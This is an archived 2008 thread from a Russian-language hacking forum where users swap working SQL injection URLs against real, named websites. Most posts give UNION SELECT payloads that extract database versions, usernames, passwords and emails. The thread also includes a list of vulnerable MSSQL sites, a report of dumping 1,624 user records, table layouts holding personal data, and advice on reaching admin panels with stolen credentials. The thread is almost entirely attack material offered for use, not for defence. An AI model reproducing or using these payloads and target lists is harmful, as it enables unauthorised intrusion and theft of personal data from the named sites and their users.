ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.01.2008, 17:06
|
|
Новичок
Регистрация: 06.12.2007
Сообщений: 7
Провел на форуме:
30898
Репутация:
6
|
|
Вот собственно есть сайт :
http://diaries.wharton.upenn.edu/DiaristResults.asp?UserID=-1+or+1=(select+user)--
Команды исполняются, НО! добавил юзера, попробовал законектится, ввожу логин, пасс - не пускает! (не правильный пасс типа того). Может там домен надо указывать или еще чтонить? Помогите разобраться. Много сайтов встречал с такой байдой.
|
|
|
29.01.2008, 17:33
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.michaelpollan.com/article.php?id=-14+union+select+1,2,3,4,5,6,7,8,9,0/*
4.1.22-standard
-----------------------------------------------------
http://www.ciritas.ru/product.php?id=-2+union+select+1,2,3,4,5,6,7,8,9/*
4.1.22-log
-----------------------------------------------------
http://www.roskrup.ru/eq.php?razdel=9+union+select+1,2,3,4,5,6,7,8,9,0,1 ,2,3/*
вывода не нащёл ((
тиц 1.6к
|
|
|
|
29.01.2008, 17:44
|
|
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885
Репутация:
447
|
|
http://www.roskrup.ru/groats.html?goods=-17'+union+select+1,2,null,null,null,concat_ws(char (58),username,password,email),null,null,null,null, null,null,13+from+users/*
вот держи тебе и вывод и юзера какие-то не проверял откуда они, всего их 1624
|
|
|
|
29.01.2008, 18:17
|
|
Участник форума
Регистрация: 02.09.2006
Сообщений: 176
Провел на форуме:
645316
Репутация:
327
|
|
MsSQL
ttp://www.gettech.org/category2.asp?cat='
ttp://www.readersclub.org/category.asp?cat='
ttp://www.zap.co.il/cat.asp?cat='
ttp://www.algemeiner.com/generic.asp?cat='
ttp://www.winstep.net/default.asp?cat='
ttp://www.hamil.co.il/media.asp?cat='
ttp://www.felinefido.com/store/WsDefault.asp?Cat='
ttp://www.britishbookshop.at/shop/prod_list.asp?cat='
ttp://www.newsreel.org/nav/topics.asp?cat='
ttp://www.fao.org/biotech/news_list.asp?Cat='
ttp://www.liberation.press.ma/default.asp?cat='
ttp://www.stateofthenewsmedia.com/2007/narrative_digital_profile.asp?cat='
ttp://www.airfagev.com/downloads.asp?cat='
|
|
|
|
29.01.2008, 19:00
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 107
Провел на форуме:
725870
Репутация:
208
|
|
Код:
http://www.digitalidworld.com/modules.php?op=modload&name=News&file=article&sid=-1+union+select+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&mode=chrono&order=0
nuke@localhost:4.0.16-log:didw |
|
|
|
Калькулятор через инъекцию |
29.01.2008, 19:16
|
Регистрация: 18.02.2006
Сообщений: 1,090
Провел на форуме:
6489333
Репутация:
1564
|
|
Калькулятор через инъекцию
чёт надоело уже видеть, как тут версии бд, и имена юзеров выкладывают...
http://thebasketgarden.net/catalog/links.php?link_id=-99999+union+select+1,2,3,cos(pi()/10),5,6,7,8,9/*
http://thebasketgarden.net/catalog/links.php?link_id=-99999+union+select+1,2,3,ATAN2(pi(),4),5,6,7,8,9/*
Последний раз редактировалось Mobile; 29.01.2008 в 19:36..
|
|
|
|
29.01.2008, 19:40
|
|
Познающий
Регистрация: 13.01.2007
Сообщений: 96
Провел на форуме:
575156
Репутация:
50
|
|
http://www.jobs-market.ru
Код:
http://www.jobs-market.ru/resume.php?id=999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
version() - 5.0.51
database() - jobsmarket_job
user() - jobsmarket_job@localhost
Код:
17:adminip
17:--1:pass
18:bunsip
18:--1:bunsip
18:--2:why
18:--3:date
18:--4:period
19:category
19:--1:razdel
19:--2:podrazdel
26:resorderlist
26:--1:user
26:--2:unit
26:--3:number
26:--4:date
26:--5:status
27:resume
27:--14:family
27:--15:edu
32:--7:fio
32:--8:firm
32:--9:birth
32:--10:gender
32:--11:civil
32:--12:family
33:--7:zp
33:--8:gender
33:--9:grafic
33:--10:zanatost
33:--11:stage
33:--12:treb
33:--24:pay
Оставил самое интересное 
Можно снять базу мыл с фио и адресами
|
|
|
|
29.01.2008, 21:59
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
www.neo-lit.ru
http://neo-lit.ru/forprint.php?id=-2452+union+select+1,2,3,concat_ws(0x3a,name,pass), 5,6,7,8+from+neo_auth+limit+49,1/*
http://neo-lit.ru/forprint.php?id=-2452+union+select+1,2,3,concat_ws(0x3a,login,passw ord),5,6,7,8+from+u41707_other.myusers+limit+3,1/*
5.0.45-log
админка - http://neo-lit.ru/stat/ - но пасс не подошёл ..
есть табла respondents в ней (name и md5) но с префиксом и без него не могу попасть ..
http://neo-lit.ru/robots.txt
|
|
|
|
29.01.2008, 22:51
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Tyc00n, ты забыл про таблицу admins с полями pass и name админка - /admin |
|
|
|
30.01.2008, 02:25
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408
Репутация:
861
|
|
Tyc00n, руки все равно будут всегда лучше и надежнее Словари обнови, добавь стандартные таблицы и поля двигов распостраненных, сам допиши, посмотри по форуму и не будет пропускать) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
